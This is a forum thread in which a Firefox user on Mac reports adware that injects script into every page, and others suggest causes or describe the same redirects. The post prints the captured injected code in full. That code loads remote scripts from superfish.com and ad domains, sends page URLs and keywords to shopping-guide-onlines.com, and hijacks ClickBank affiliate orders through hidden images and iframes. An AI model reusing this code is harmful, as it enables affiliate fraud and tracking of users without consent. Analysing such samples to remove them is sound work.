# Shopping-Guide-Onlines.com & Superfish.com Injected Script into Firefox

Tags: javascript, firefox, code-injection

I'm running the latest version of Firefox. My OS is Mac 10.7.5. I use a cookie manager and, until recently, NoScript. Recently I disabled NoScript.

When logging into one of my Yahoo email accounts, I got an unusual pop-up window that by all appearances looked legit. It said something to the effect that I had not updated my marketing preferences and that I had to do so or my account would be terminated. The "Terminated" part seemed immediately fishy, but the window (popped up at the bottom of my screen), was intrusive so I tried to click on the "X" to close it. It launched another window, which I immediately closed.

Immediately after, I noticed all sorts of changes with Firefox. I ended up blocking all outgoing connections with LittleSnitch to shopping-guide-onlines.com and superfish.com. However, they're still working some evil magic.

When I use the WebDeveloper add-on to view the GENERATED source code, the following appears on ANY page I navigate to (I blotted out personal info).

```
<script>var scr = document.createElement( "script" );
scr.type= 'text/javascript';
scr.setAttribute( "src", "http://spns.rotatemyad.com/scripts/c07da12841ed3554e8f1a548ab1e3a57ce18a908.js" );
scr.setAttribute('async', 'true');
document.getElementsByTagName('head')[0].appendChild( scr );
var scr = document.createElement( "script" );
scr.type= 'text/javascript';
if (window.location.protocol.indexOf( "https" ) > -1) {
scr.setAttribute( "src", "https://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&userId=&CTID=mp");
} else {
scr.setAttribute( "src", "http://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&userId=&CTID=mp");
}
scr.setAttribute('async', 'true');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild( scr );

if( document.location.href.search("•••••.com") > -1 ||
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 ) {

    var scr = document.createElement( "script" );
    scr.type= 'text/javascript';
    scr.setAttribute( "src", "http://shopping-guide-online.com/c2.php" );
    document.getElementsByTagName('head')[0].appendChild( scr );
}

if( document.location.href.search("clickbank.net/order/orderform") > -1 ) {
    var aff1 = "kwrdstool";
    var body = document.getElementsByTagName('body')[0];
    var aff2 = body.innerHTML.match(/\[affiliate = (.*?)\]/i);
    if( aff2.hasOwnProperty("1") && aff2[1] != "" ) {
        if( aff1 != aff2[1] ) {
            var head = document.getElementsByTagName('head')[0].innerHTML;
            var vend = head.match(/<!-- vs: (.*?) -->/i);
            if( vend.hasOwnProperty("1") && vend[1] != "" ) {
                body.style.display = "none";
                var f = document.createElement('img');
                f.style.width   = '1px';
                f.style.height = '1px';
                f.style.position = 'absolute';
                f.style.top = '-999px';
                f.src = "http://" + aff1 + "." + vend[1] + ".hop.clickbank.net";
                setTimeout( function() { window.location.href = window.location.href; }, 2000 );
                body.appendChild(f);
            }
        }
    }
} 

function get_mk()
{
    metaCollection = document.getElementsByTagName("meta");
    for (i = 0; i < metaCollection.length; i++) {
        if (metaCollection[i].name.search(/keywords/i) != -1)
        {
            return metaCollection[i].content
        }
    }
    return ""
}

function add_a(a)
{
    var b       = document.getElementsByTagName('body')[0];
    var f       = document.createElement('iframe');
    f.id        ='ifr1';
    f.style.width   ='1px';
    f.style.height  ='1px';
    f.style.position= 'absolute';
    f.style.top     ='-999px';
    f.src       = a;

    b.appendChild(f);
}

function add_script(a)
{
    var b       = document.getElementsByTagName('head')[0];
    var f       = document.createElement('script');
    f.id        ='scr1';
    f.src       = a;

    b.appendChild(f);
}




function contains(a, e){ for(j=0;j<a.length;j++)if(a[j]==e)return true; return false;}
function setCookie(c_name,value,exdays){ var exdate=new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); document.cookie=c_name + "=" + c_value; }

function getCookie(c_name)
{var i,x,y,ARRcookies=document.cookie.split(";");for(i=0;i<ARRcookies.length;i++)
{x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);x=x.replace(/^\s+|\s+$/g,"");if(x==c_name)
{return unescape(y);}}}


shuffle = function(o){ //v1.0
    for(var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
    return o;
};


function get_timestamp(){   return Math.round((new Date()).getTime() / 1000);}
function trim (myString){   return myString.replace(/^\s+/g,'').replace(/\s+$/g,'')}


var cur_loc=escape(window.location);
if( cur_loc.length<500 )
{
var scr = document.createElement( "script" );
scr.type= 'text/javascript';get_mk
scr.setAttribute( "src", "http://shopping-guide-onlines.com/search/adi/g.php?k=" + encodeURIComponent(get_mk().substring(0, 200)) + "&r=" + encodeURIComponent(window.location));      
scr.setAttribute('async', 'true');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild( scr );
}var added_order=false; if(document.getElementById( "fbevid1" )!=undefined)
    {
        if(document.getElementById( "fbevid2" )!=undefined)
        {
            document.getElementById( "fbevid1" ).style.display="none";
            document.getElementById( "fbevid2" ).style.display="";
        }
    }</script><script async="true" src="http://spns.rotatemyad.com/scripts/c07da12841ed3554e8f1a548ab1e3a57ce18a908.js" type="text/javascript"></script><script async="true" src="http://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&amp;userId=&amp;CTID=mp" type="text/javascript"></script><script async="true" src="http://shopping-guide-onlines.com/search/adi/g.php?k=&amp;r=http%3A%2F%2F••••••••.html" type="text/javascript"></script>
```

I haven't found any publications that offer fixes for this. Clearing cache did nothing. This is infuriating because it was done underhanded, and as I understand, there are MANY big companies that use shopping-guide-onlines, superfish and rotatemyad. If that's the case, they're all crooks.

Comment: You may have a virus, a malicious extension, or a malicious upstream proxy.  What do you see in View Source?

Comment: View Source is fine; just gives the actual page content. It's when I view the Generated Source that the script becomes visible.

I don't run a lot of add-ons. I thought it might be AdBlockPlus, since I recently read something about them cutting deals with ad deliverers, but I disabled it and still have the same script being generated.

These generated requests aren't going anywhere because I've blocked all outgoing requests to those IPs and domains, but for that script to continue to generate...well, I haven't found the culprit.

Comment: i have a same problem as you, since this morning, i don't understand why everytime i load a webpage, it will auto redirect to this site:
http://shopping-guide-onlines.com/search/click.php?id=u92V783w301P52&u=mc0012g
i have block it in host but it still redirected.
i hope someone will help me to fix this problem, it's so annoying.
btw my english is not good, so sorry if i write wrong somewhere.